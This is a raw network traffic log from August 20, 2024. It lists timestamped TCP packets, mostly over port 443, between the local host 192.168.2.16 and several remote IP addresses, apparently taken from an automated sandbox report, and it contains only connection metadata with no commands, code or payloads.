                                                Aug 20, 2024 15:42:13.003886938 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.003946066 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.004630089 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.004697084 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.004761934 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.004806042 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.004841089 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.004849911 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.004859924 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.004894972 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.005620956 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.005703926 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.005721092 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.005779028 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.005784035 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.005841970 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.005892992 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.005898952 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.005944014 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.093943119 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094011068 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094137907 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094137907 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094153881 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094180107 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094201088 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094206095 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094239950 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094383001 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094438076 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094443083 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094485998 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094486952 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094496012 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094547987 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094645023 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094681978 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094701052 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094707012 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094717979 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.094734907 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094759941 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.094770908 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095345974 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095411062 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.095416069 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095424891 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095477104 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.095482111 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095608950 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095643044 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095663071 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.095666885 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.095702887 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096231937 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096297979 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096302986 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096350908 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096360922 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096364975 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096400976 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096472025 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096525908 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096535921 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096581936 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.096620083 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.096678019 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.097338915 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.097403049 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.097407103 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.097459078 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.097461939 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.097507000 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.097512960 CEST44349764188.114.97.3192.168.2.16
                                                Aug 20, 2024 15:42:13.097544909 CEST49764443192.168.2.16188.114.97.3
                                                Aug 20, 2024 15:42:13.249200106 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.249236107 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.249321938 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.252619028 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.252629995 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.282274008 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.282310009 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.282407045 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.282596111 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.282610893 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.290719986 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.290749073 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.290843010 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.291006088 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.291013956 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.735126972 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.735413074 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.735433102 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.736403942 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.736507893 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.736757040 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.736819029 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.736901999 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.736910105 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:13.756769896 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.757081032 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.757097006 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.758217096 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.758377075 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.759247065 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.759314060 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.759380102 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.759386063 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.778892040 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:13.795547009 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.795742989 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.795753956 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.796108961 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.796401024 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.796467066 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.796504974 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.810862064 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.842995882 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.843005896 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.865644932 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865729094 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865776062 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865828037 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865861893 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865871906 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.865890980 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.865895987 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865936041 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.865943909 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.865999937 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.866043091 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.866048098 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.866596937 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.866628885 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.866652012 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.866656065 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.866698027 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.871649027 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.921875000 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.930531025 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.930605888 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.930666924 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.931102991 CEST49766443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:13.931127071 CEST44349766162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:13.951948881 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.951994896 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952142954 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.952151060 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952199936 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952235937 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952245951 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.952253103 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952297926 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.952610970 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952682018 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952719927 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.952724934 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952802896 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.952852964 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.952857018 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953389883 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953447104 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.953450918 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953504086 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953536034 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953547001 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.953552961 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.953600883 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.954262972 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.954391956 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.954421997 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.954433918 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:13.954438925 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:13.954477072 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.001218081 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.038526058 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.038577080 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.038675070 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.038685083 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.038733959 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.039160967 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.039167881 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.039232016 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.039237022 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.039244890 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.039299965 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.040754080 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.040791035 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.040837049 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.040843010 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.040858030 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.040889025 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.041639090 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.041698933 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.041711092 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.041718960 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.041739941 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.041773081 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.041825056 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.041973114 CEST49767443192.168.2.16151.101.194.137
                                                Aug 20, 2024 15:42:14.041987896 CEST44349767151.101.194.137192.168.2.16
                                                Aug 20, 2024 15:42:14.052923918 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.052968025 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.053028107 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.053194046 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.053239107 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.053297997 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.053442001 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.053457975 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.053586960 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.053601027 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.301398039 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301446915 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301480055 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301508904 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301537991 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301558018 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:14.301570892 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.301584959 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:14.301660061 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:14.302031040 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.302124977 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.302194118 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:14.302637100 CEST49765443192.168.2.16188.114.96.3
                                                Aug 20, 2024 15:42:14.302650928 CEST44349765188.114.96.3192.168.2.16
                                                Aug 20, 2024 15:42:14.507785082 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.508133888 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.508157015 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.509809017 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.509887934 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.510175943 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.510296106 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.510302067 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.552505970 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.560882092 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.560897112 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.565193892 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.565454960 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.565490961 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.565865040 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.566157103 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.566222906 CEST44349768162.241.87.113192.168.2.16
                                                Aug 20, 2024 15:42:14.606092930 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606159925 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606190920 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606201887 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606216908 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606256008 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606272936 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606318951 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606331110 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606406927 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606451988 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606457949 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606846094 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606889009 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606892109 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606900930 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.606931925 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.606937885 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.608876944 CEST49768443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:14.656871080 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.656884909 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.692704916 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.692815065 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.692820072 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.692851067 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.692900896 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.692958117 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.693643093 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.693711996 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.693721056 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.693862915 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.693912983 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.693919897 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694031954 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694084883 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.694092035 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694180012 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694227934 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.694235086 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694762945 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694832087 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.694839001 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694917917 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.694967985 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.694974899 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.695518017 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.695574999 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.695583105 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.695751905 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.695797920 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.695806026 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.697285891 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.697350979 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.697359085 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.736870050 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.736882925 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.761285067 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.761410952 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.761428118 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778573036 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778635979 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778640032 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.778649092 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778693914 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778697968 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.778706074 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778740883 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.778827906 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778906107 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778939962 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778943062 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.778949022 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.778985977 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.778990984 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779607058 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779613972 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779643059 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779658079 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779664993 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779673100 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.779680967 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.779707909 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.779732943 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.780374050 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.780442953 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.780448914 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.780503035 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.780534029 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:14.780576944 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.780745983 CEST49769443192.168.2.16151.101.130.137
                                                Aug 20, 2024 15:42:14.780762911 CEST44349769151.101.130.137192.168.2.16
                                                Aug 20, 2024 15:42:26.639086008 CEST4970180192.168.2.16192.229.221.95
                                                Aug 20, 2024 15:42:26.644979000 CEST8049701192.229.221.95192.168.2.16
                                                Aug 20, 2024 15:42:26.645136118 CEST4970180192.168.2.16192.229.221.95
                                                Aug 20, 2024 15:42:36.225045919 CEST49736443192.168.2.16162.241.114.35
                                                Aug 20, 2024 15:42:36.225055933 CEST44349736162.241.114.35192.168.2.16
                                                Aug 20, 2024 15:42:38.074068069 CEST49739443192.168.2.16162.241.87.113
                                                Aug 20, 2024 15:42:38.074085951 CEST44349739162.241.87.113192.168.2.16
                                                TimestampSource PortDest PortSource IPDest IP
